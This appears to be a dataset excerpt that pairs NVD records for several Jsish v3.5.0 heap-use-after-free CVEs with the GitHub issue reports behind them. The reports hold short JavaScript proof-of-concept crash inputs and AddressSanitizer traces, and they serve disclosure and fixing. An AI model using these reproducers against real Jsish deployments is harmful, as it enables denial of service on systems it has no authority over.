#8 0x563779af503a in jsi_main src/main.c:47
#9 0x7f66650eebf6 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21bf6)
#10 0x563779284969 in _start (/usr/local/bin/jsish+0xe8969)
0x603000006e84 is located 4 bytes inside of 32-byte region [0x603000006e80,0x603000006ea0)
freed by thread T0 here:
#0 0x7f6665d5d7a8 in __interceptor_free (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xde7a8)
#1 0x5637792a56cf in Jsi_DecrRefCount src/jsiValue.c:52
previously allocated by thread T0 here:
#0 0x7f6665d5dd28 in __interceptor_calloc (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xded28)
#1 0x5637792f5aa4 in Jsi_Calloc src/jsiUtils.c:57
SUMMARY: AddressSanitizer: heap-use-after-free src/jsiValue.c:245 in jsi_ValueCopyMove
Shadow bytes around the buggy address:
0x0c067fff8d80: fa fa 00 00 00 00 fa fa 00 00 00 00 fa fa 00 00
0x0c067fff8d90: 00 00 fa fa 00 00 00 00 fa fa 00 00 00 00 fa fa
0x0c067fff8da0: fd fd fd fd fa fa fd fd fd fd fa fa fd fd fd fd
0x0c067fff8db0: fa fa fd fd fd fd fa fa 00 00 04 fa fa fa 00 00
0x0c067fff8dc0: 04 fa fa fa 00 00 00 00 fa fa 00 00 00 00 fa fa
=>0x0c067fff8dd0:[fd]fd fd fd fa fa 00 00 00 00 fa fa fd fd fd fd
0x0c067fff8de0: fa fa fd fd fd fd fa fa fd fd fd fd fa fa fd fd
0x0c067fff8df0: fd fd fa fa fd fd fd fd fa fa fd fd fd fd fa fa
0x0c067fff8e00: 00 00 00 00 fa fa 00 00 00 00 fa fa fa fa fa fa
0x0c067fff8e10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c067fff8e20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==99189==ABORTING
```
Credits: Found by OWL337 team. | Heap-use-after-free src/jsiValue.c:245 in jsi_ValueCopyMove | https://api.github.com/repos/pcmacdon/jsish/issues/76/comments | 0 | 2021-12-24T10:44:21Z | 2022-01-12T02:15:38Z | https://github.com/pcmacdon/jsish/issues/76 | 1,088,309,178 | 76 | 3,125 |
CVE-2021-46500 | 2022-01-27T21:15:09.047 | Jsish v3.5.0 was discovered to contain a heap-use-after-free via jsi_ArgTypeCheck in src/jsiFunc.c. This vulnerability can lead to a Denial of Service (DoS). | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/pcmacdon/jsish/issues/85"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/pcmacdon/jsish/issues/85"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:jsish:jsish:3.5.0:*:*:*:*:*:*:*",
"matchCriteriaId": "E97897F2-55BD-40DD-9F33-7980D892A505",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"416"
] | 416 | https://github.com/pcmacdon/jsish/issues/85 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"pcmacdon",
"jsish"
] | ###### Jsish revision
Commit: [9fa798e](https://github.com/pcmacdon/jsish/commit/9fa798e35d7a753672d1bd16e98b124e7b2d2899)
Version: v3.5.0
###### Build platform
Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64)
###### Build steps
```bash
export CFLAGS='-fsanitize=address'
make
```
###### Test case
```javascript
var JSEtest = [
'aa',
'gg',
'hhh',
'mm',
'nn'
];
'sort:' + JSEtest.sort(function (str, position) {
return JSEtest.unshift('pop:' + JSEtest.pop());
});
!'concat:' + JSEtest.concat().every(function (E) {
return 'sort:' + JSEtest.sort(function (str, position) {
return JSEtest.unshift('pop:' + JSEtest.pop());
});
});
```
###### Execution steps & Output
```bash
$ ./jsish/jsish poc.js
=====ERROR: AddressSanitizer: heap-use-after-free on address 0x603000007458 at pc 0x5566730cf1ca bp 0x7ffe092500c0 sp 0x7ffe092500b0
READ of size 1 at 0x603000007458 thread T0
#0 0x5566730cf1c9 in jsi_ArgTypeCheck src/jsiFunc.c:207
#1 0x556673158c49 in jsi_FuncCallSub src/jsiProto.c:263
#2 0x55667342171a in jsiFunctionSubCall src/jsiEval.c:796
#3 0x55667342171a in jsiEvalFunction src/jsiEval.c:837
#4 0x55667342171a in jsiEvalCodeSub src/jsiEval.c:1264
#5 0x55667343515e in jsi_evalcode src/jsiEval.c:2204
#6 0x556673158834 in jsi_FuncCallSub src/jsiProto.c:220
#7 0x5566730d4fec in jsi_FunctionInvoke src/jsiFunc.c:777
#8 0x5566730d4fec in Jsi_FunctionInvoke src/jsiFunc.c:789
#9 0x556673186fa8 in SortSubCmd src/jsiArray.c:970
#10 0x7f067f973311 (/lib/x86_64-linux-gnu/libc.so.6+0x42311)
#11 0x7f067f9736b5 in qsort_r (/lib/x86_64-linux-gnu/libc.so.6+0x426b5)
#12 0x55667318a611 in jsi_ArraySortCmd src/jsiArray.c:1065
#13 0x556673157818 in jsi_FuncCallSub src/jsiProto.c:244
#14 0x55667342171a in jsiFunctionSubCall src/jsiEval.c:796
#15 0x55667342171a in jsiEvalFunction src/jsiEval.c:837
#16 0x55667342171a in jsiEvalCodeSub src/jsiEval.c:1264
#17 0x55667343515e in jsi_evalcode src/jsiEval.c:2204
#18 0x556673158834 in jsi_FuncCallSub src/jsiProto.c:220
#19 0x5566730d4fec in jsi_FunctionInvoke src/jsiFunc.c:777
#20 0x5566730d4fec in Jsi_FunctionInvoke src/jsiFunc.c:789
#21 0x55667319bf64 in jsi_ArrayFindSubCmd src/jsiArray.c:576
#22 0x55667319bf64 in jsi_ArrayEveryCmd src/jsiArray.c:663
#23 0x556673157818 in jsi_FuncCallSub src/jsiProto.c:244
#24 0x55667342171a in jsiFunctionSubCall src/jsiEval.c:796
#25 0x55667342171a in jsiEvalFunction src/jsiEval.c:837
#26 0x55667342171a in jsiEvalCodeSub src/jsiEval.c:1264
#27 0x55667343515e in jsi_evalcode src/jsiEval.c:2204
#28 0x556673439274 in jsi_evalStrFile src/jsiEval.c:2665
#29 0x55667312866a in Jsi_Main src/jsiInterp.c:936
#30 0x55667392d03a in jsi_main src/main.c:47
#31 0x7f067f952bf6 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21bf6)
#32 0x5566730bc969 in _start (/usr/local/bin/jsish+0xe8969)
0x603000007458 is located 8 bytes inside of 32-byte region [0x603000007450,0x603000007470)
freed by thread T0 here:
#0 0x7f06805c17a8 in __interceptor_free (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xde7a8)
#1 0x5566730dd6cf in Jsi_DecrRefCount src/jsiValue.c:52
previously allocated by thread T0 here:
#0 0x7f06805c1d28 in __interceptor_calloc (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xded28)
#1 0x55667312daa4 in Jsi_Calloc src/jsiUtils.c:57
SUMMARY: AddressSanitizer: heap-use-after-free src/jsiFunc.c:207 in jsi_ArgTypeCheck
Shadow bytes around the buggy address:
0x0c067fff8e30: fd fd fd fd fa fa fd fd fd fd fa fa fd fd fd fd
0x0c067fff8e40: fa fa fd fd fd fd fa fa fd fd fd fd fa fa fd fd
0x0c067fff8e50: fd fd fa fa fd fd fd fd fa fa fd fd fd fd fa fa
0x0c067fff8e60: fd fd fd fd fa fa fd fd fd fd fa fa fd fd fd fd
0x0c067fff8e70: fa fa fd fd fd fd fa fa fd fd fd fd fa fa fd fd
=>0x0c067fff8e80: fd fd fa fa fd fd fd fd fa fa fd[fd]fd fd fa fa
0x0c067fff8e90: fd fd fd fd fa fa fd fd fd fd fa fa fd fd fd fd
0x0c067fff8ea0: fa fa fd fd fd fd fa fa fd fd fd fd fa fa fd fd
0x0c067fff8eb0: fd fd fa fa fd fd fd fd fa fa fd fd fd fd fa fa
0x0c067fff8ec0: fd fd fd fd fa fa 00 00 00 00 fa fa fd fd fd fd
0x0c067fff8ed0: fa fa fd fd fd fd fa fa fd fd fd fd fa fa fd fd
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
```
| Heap-use-after-free src/jsiFunc.c:207 in jsi_ArgTypeCheck | https://api.github.com/repos/pcmacdon/jsish/issues/85/comments | 2 | 2021-12-24T10:51:56Z | 2021-12-26T22:47:18Z | https://github.com/pcmacdon/jsish/issues/85 | 1,088,313,003 | 85 | 3,126 |
CVE-2021-46501 | 2022-01-27T21:15:09.097 | Jsish v3.5.0 was discovered to contain a heap-use-after-free via SortSubCmd in src/jsiArray.c. This vulnerability can lead to a Denial of Service (DoS). | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/pcmacdon/jsish/issues/86"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/pcmacdon/jsish/issues/86"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:jsish:jsish:3.5.0:*:*:*:*:*:*:*",
"matchCriteriaId": "E97897F2-55BD-40DD-9F33-7980D892A505",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"416"
] | 416 | https://github.com/pcmacdon/jsish/issues/86 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"pcmacdon",
"jsish"
] | ###### Jsish revision
Commit: [9fa798e](https://github.com/pcmacdon/jsish/commit/9fa798e35d7a753672d1bd16e98b124e7b2d2899)
Version: v3.5.0
###### Build platform
Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64)
###### Build steps
```bash
export CFLAGS='-fsanitize=address'
make
```
###### Test case
```javascript
var JSEtest = [
'aa',
'bb',
'cc'
];
var results = JSEtest;
JSEtest.findIndex(function (kV) {
JSEtest.sort(function (str, position) {
results.push(kV);
});
});
```
###### Execution steps & Output
```bash
$ ./jsish/jsish poc.js
==106201==ERROR: AddressSanitizer: heap-use-after-free on address 0x60c000018678 at pc 0x56468deff5a0 bp 0x7fff9a37c2a0 sp 0x7fff9a37c290
READ of size 8 at 0x60c000018678 thread T0
#0 0x56468deff59f in SortSubCmd src/jsiArray.c:958
#1 0x7fb68d0b0311 (/lib/x86_64-linux-gnu/libc.so.6+0x42311)
#2 0x7fb68d0b027d (/lib/x86_64-linux-gnu/libc.so.6+0x4227d)
#3 0x7fb68d0b027d (/lib/x86_64-linux-gnu/libc.so.6+0x4227d)
#4 0x7fb68d0b06b5 in qsort_r (/lib/x86_64-linux-gnu/libc.so.6+0x426b5)
#5 0x56468df02611 in jsi_ArraySortCmd src/jsiArray.c:1065
#6 0x56468decf818 in jsi_FuncCallSub src/jsiProto.c:244
#7 0x56468e19971a in jsiFunctionSubCall src/jsiEval.c:796
#8 0x56468e19971a in jsiEvalFunction src/jsiEval.c:837
#9 0x56468e19971a in jsiEvalCodeSub src/jsiEval.c:1264
#10 0x56468e1ad15e in jsi_evalcode src/jsiEval.c:2204
#11 0x56468ded0834 in jsi_FuncCallSub src/jsiProto.c:220
#12 0x56468de4cfec in jsi_FunctionInvoke src/jsiFunc.c:777
#13 0x56468de4cfec in Jsi_FunctionInvoke src/jsiFunc.c:789
#14 0x56468df0dc0b in jsi_ArrayFindSubCmd src/jsiArray.c:576
#15 0x56468df0dc0b in jsi_ArrayFindIndexCmd src/jsiArray.c:666
#16 0x56468decf818 in jsi_FuncCallSub src/jsiProto.c:244
#17 0x56468e19971a in jsiFunctionSubCall src/jsiEval.c:796
#18 0x56468e19971a in jsiEvalFunction src/jsiEval.c:837
#19 0x56468e19971a in jsiEvalCodeSub src/jsiEval.c:1264
#20 0x56468e1ad15e in jsi_evalcode src/jsiEval.c:2204
#21 0x56468e1b1274 in jsi_evalStrFile src/jsiEval.c:2665
#22 0x56468dea066a in Jsi_Main src/jsiInterp.c:936
#23 0x56468e6a503a in jsi_main src/main.c:47
#24 0x7fb68d08fbf6 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21bf6)
#25 0x56468de34969 in _start (/usr/local/bin/jsish+0xe8969)
0x60c000018678 is located 56 bytes inside of 128-byte region [0x60c000018640,0x60c0000186c0)
freed by thread T0 here:
#0 0x7fb68dcfef30 in realloc (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xdef30)
#1 0x56468dea5972 in Jsi_Realloc src/jsiUtils.c:47
previously allocated by thread T0 here:
#0 0x7fb68dcfef30 in realloc (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xdef30)
#1 0x56468dea5972 in Jsi_Realloc src/jsiUtils.c:47
SUMMARY: AddressSanitizer: heap-use-after-free src/jsiArray.c:958 in SortSubCmd
Shadow bytes around the buggy address:
0x0c187fffb070: fd fd fd fd fd fd fd fd fa fa fa fa fa fa fa fa
0x0c187fffb080: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x0c187fffb090: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd
0x0c187fffb0a0: fd fd fd fd fd fd fd fd fa fa fa fa fa fa fa fa
0x0c187fffb0b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c187fffb0c0: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd[fd]
0x0c187fffb0d0: fd fd fd fd fd fd fd fd fa fa fa fa fa fa fa fa
0x0c187fffb0e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c187fffb0f0: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
0x0c187fffb100: 00 00 00 00 00 00 00 00 fa fa fa fa fa fa fa fa
0x0c187fffb110: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==106201==ABORTING
``` | Heap-use-after-free src/jsiArray.c:958 in SortSubCmd | https://api.github.com/repos/pcmacdon/jsish/issues/86/comments | 0 | 2021-12-24T10:52:55Z | 2021-12-26T22:47:42Z | https://github.com/pcmacdon/jsish/issues/86 | 1,088,313,466 | 86 | 3,127 |
CVE-2021-46502 | 2022-01-27T21:15:09.143 | Jsish v3.5.0 was discovered to contain a heap-use-after-free via /usr/lib/x86_64-linux-gnu/libasan.so.4+0x5166d. This vulnerability can lead to a Denial of Service (DoS). | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/pcmacdon/jsish/issues/87"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/pcmacdon/jsish/issues/87"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:jsish:jsish:3.5.0:*:*:*:*:*:*:*",
"matchCriteriaId": "E97897F2-55BD-40DD-9F33-7980D892A505",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"416"
] | 416 | https://github.com/pcmacdon/jsish/issues/87 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"pcmacdon",
"jsish"
] | ###### Jsish revision
Commit: [9fa798e](https://github.com/pcmacdon/jsish/commit/9fa798e35d7a753672d1bd16e98b124e7b2d2899)
Version: v3.5.0
###### Build platform
Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64)
###### Build steps
```bash
export CFLAGS='-fsanitize=address'
make
```
###### Test case
```javascript
var x = 3;
if (("ab".replace("b", "ab".constructor).replace("b", "ab".constructor)!=="aa") || (x!==undefined)) {
throw "Err-value!";
}
```
###### Execution steps & Output
```bash
$ ./jsish/jsish poc.js
=====ERROR: AddressSanitizer: heap-use-after-free on address 0x602000001cf3 at pc 0x7fae379c366e bp 0x7ffdcb94e5a0 sp 0x7ffdcb94dd48
READ of size 2 at 0x602000001cf3 thread T0
#0 0x7fae379c366d (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x5166d)
#1 0x55927a403f60 in Jsi_Strlen src/jsiChar.c:29
#2 0x55927a508a57 in Jsi_DSAppendLen src/jsiDString.c:99
#3 0x55927a508e7f in Jsi_DSAppend src/jsiDString.c:129
#4 0x55927a40d4b8 in StringReplaceCmd src/jsiString.c:705
#5 0x55927a3ed818 in jsi_FuncCallSub src/jsiProto.c:244
#6 0x55927a6b771a in jsiFunctionSubCall src/jsiEval.c:796
#7 0x55927a6b771a in jsiEvalFunction src/jsiEval.c:837
#8 0x55927a6b771a in jsiEvalCodeSub src/jsiEval.c:1264
#9 0x55927a6cb15e in jsi_evalcode src/jsiEval.c:2204
#10 0x55927a6cf274 in jsi_evalStrFile src/jsiEval.c:2665
#11 0x55927a3be66a in Jsi_Main src/jsiInterp.c:936
#12 0x55927abc303a in jsi_main src/main.c:47
#13 0x7fae36de1bf6 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21bf6)
#14 0x55927a352969 in _start (/usr/local/bin/jsish+0xe8969)
0x602000001cf4 is located 0 bytes to the right of 4-byte region [0x602000001cf0,0x602000001cf4)
freed by thread T0 here:
#0 0x7fae37a507a8 in __interceptor_free (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xde7a8)
#1 0x55927a412c19 in StringConstructor src/jsiString.c:33
previously allocated by thread T0 here:
#0 0x7fae37a50b40 in __interceptor_malloc (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xdeb40)
#1 0x55927a3c3a22 in Jsi_Malloc src/jsiUtils.c:52
SUMMARY: AddressSanitizer: heap-use-after-free (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x5166d)
Shadow bytes around the buggy address:
0x0c047fff8340: fa fa fd fd fa fa fd fd fa fa fd fd fa fa fd fd
0x0c047fff8350: fa fa fd fd fa fa fd fd fa fa fd fd fa fa fd fd
0x0c047fff8360: fa fa fd fd fa fa fd fd fa fa 07 fa fa fa fd fd
0x0c047fff8370: fa fa 00 07 fa fa 00 fa fa fa 00 00 fa fa 00 00
0x0c047fff8380: fa fa 00 00 fa fa 00 00 fa fa 00 00 fa fa 00 00
=>0x0c047fff8390: fa fa 00 00 fa fa fd fa fa fa fd fa fa fa[fd]fa
0x0c047fff83a0: fa fa fd fa fa fa 04 fa fa fa fa fa fa fa fa fa
0x0c047fff83b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff83c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff83d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff83e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
```
| Heap-use-after-free (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x5166d) | https://api.github.com/repos/pcmacdon/jsish/issues/87/comments | 0 | 2021-12-24T10:53:39Z | 2021-12-26T22:08:17Z | https://github.com/pcmacdon/jsish/issues/87 | 1,088,313,832 | 87 | 3,128 |
CVE-2021-46503 | 2022-01-27T21:15:09.187 | Jsish v3.5.0 was discovered to contain a heap-use-after-free via /usr/lib/x86_64-linux-gnu/libasan.so.4+0x79732. This vulnerability can lead to a Denial of Service (DoS). | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/pcmacdon/jsish/issues/88"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/pcmacdon/jsish/issues/88"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:jsish:jsish:3.5.0:*:*:*:*:*:*:*",
"matchCriteriaId": "E97897F2-55BD-40DD-9F33-7980D892A505",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"416"
] | 416 | https://github.com/pcmacdon/jsish/issues/88 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"pcmacdon",
"jsish"
] | ###### Jsish revision
Commit: [9fa798e](https://github.com/pcmacdon/jsish/commit/9fa798e35d7a753672d1bd16e98b124e7b2d2899)
Version: v3.5.0
###### Build platform
Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64)
###### Build steps
```bash
export CFLAGS='-fsanitize=address'
make
```
###### Test case
```javascript
try {
var JSEtest = new String('test string');
var At = JSEtest.constructor(JSEtest);
} catch (e) {
}
```
###### Execution steps & Output
```bash
$ ./jsish/jsish poc.js
==88163==ERROR: AddressSanitizer: heap-use-after-free on address 0x602000001bf0 at pc 0x7f8c725b9733 bp 0x7ffeb1c188d0 sp 0x7ffeb1c18078
READ of size 11 at 0x602000001bf0 thread T0
#0 0x7f8c725b9732 (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x79732)
#1 0x5576fd6ba249 in memcpy /usr/include/x86_64-linux-gnu/bits/string_fortified.h:34
#2 0x5576fd6ba249 in Jsi_StrdupLen src/jsiChar.c:74
#3 0x5576fd6c8ac0 in StringConstructor src/jsiString.c:35
#4 0x5576fd6a3818 in jsi_FuncCallSub src/jsiProto.c:244
#5 0x5576fd96d71a in jsiFunctionSubCall src/jsiEval.c:796
#6 0x5576fd96d71a in jsiEvalFunction src/jsiEval.c:837
#7 0x5576fd96d71a in jsiEvalCodeSub src/jsiEval.c:1264
#8 0x5576fd98115e in jsi_evalcode src/jsiEval.c:2204
#9 0x5576fd985274 in jsi_evalStrFile src/jsiEval.c:2665
#10 0x5576fd67466a in Jsi_Main src/jsiInterp.c:936
#11 0x5576fde7903a in jsi_main src/main.c:47
#12 0x7f8c719afbf6 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21bf6)
#13 0x5576fd608969 in _start (/usr/local/bin/jsish+0xe8969)
0x602000001bf0 is located 0 bytes inside of 12-byte region [0x602000001bf0,0x602000001bfc)
freed by thread T0 here:
#0 0x7f8c7261e7a8 in __interceptor_free (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xde7a8)
#1 0x5576fd6c8c19 in StringConstructor src/jsiString.c:33
previously allocated by thread T0 here:
#0 0x7f8c7261eb40 in __interceptor_malloc (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xdeb40)
#1 0x5576fd679a22 in Jsi_Malloc src/jsiUtils.c:52
SUMMARY: AddressSanitizer: heap-use-after-free (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x79732)
Shadow bytes around the buggy address:
0x0c047fff8320: fa fa fd fd fa fa fd fd fa fa fd fd fa fa fd fd
0x0c047fff8330: fa fa fd fd fa fa fd fd fa fa fd fd fa fa fd fd
